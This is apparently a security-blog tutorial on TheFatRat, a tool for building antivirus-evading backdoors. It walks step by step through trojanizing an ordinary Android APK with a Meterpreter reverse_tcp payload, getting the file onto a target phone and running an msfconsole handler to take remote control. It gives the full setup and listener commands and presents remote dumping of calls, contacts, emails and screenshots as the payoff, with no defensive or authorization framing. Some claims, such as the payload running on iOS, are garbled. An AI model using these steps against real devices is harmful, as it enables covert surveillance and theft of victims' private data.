TheFatRat is a simple RAT tool for creating backdoor and post-exploitation attacks such as browser attacks. This Android RAT tool generates the standard payload code and then it is run on Ios, Android and Macintosh.
Malware that is developed by TheFatRat can bypass antivirus. By circumventing AV & Firewalls, attackers can access a meterpreter.
Automating Metasploit functions in this Android RAT
- Create backdoor for Windows, Linux, Mac, and Android
- This Android RAT Bypass antivirus backdoor
- Checks for Metasploit service and starts if not present
- Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
- Start multiple meterpreter reverse_tcp listeners
- Fast Search in searchsploit
- Bypass AV
- File pumper
- Create backdoor with another technique
- Autorun script for listeners ( easy to use )
Connection to Mobile Targeted Device–Android RAT (TheFatRat)
This Android RAT software TheFatRaT can be downloaded from Github.
git clone https://github.com/Screetsec/TheFatRat.git
Once that command is executed, it will clone and store it under TheFatRat.
cd TheFatRat
Then we need to give executable permission and run setup.sh
chmod +x setup.sh && ./setup.sh
Installation would take between 10-15 minutes, while checking the missing components if something is missing it will automatically download and install.
Once the installation is complete, you will obtain a list of payload options.
We continue to do backdoor with the original APK file in this Kali Linux tutorial, so we must choose option 5 here.
Meanwhile, we should install any common APK device file for Android and then enter the file path.
Having done everything we need to select the Meterpreter to use, reverse tcp is selected here.
Then you have to pick the method for the development of APK.
APK is developing, decompiling the original APK to add payloads and then recompiling the file. This uses ambiguous approaches to include payloads and also includes a digital signature.
Once you have created the payload with the original APK file, mobile phones can be moved by File Transfer or other methods.
Then we have to set up msfconsole for me meterpreter session.
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip)
set lport (same port provided before)
exploit
You get the meterpreter session once the software is enabled and full system controls. You can find all imaginable executive commands by typing “support.” In this Android RAT tool, you can dump calls, addresses, emails, and even screenshots from the mobile device remotely.
Thank theFatRat Authors team to create an amazing and simple Android RAT device.
You can also use the Master in Wireshark Network Analysis to stay automatically updated on Linkedin, Twitter and Facebook for regular cyber security alerts.
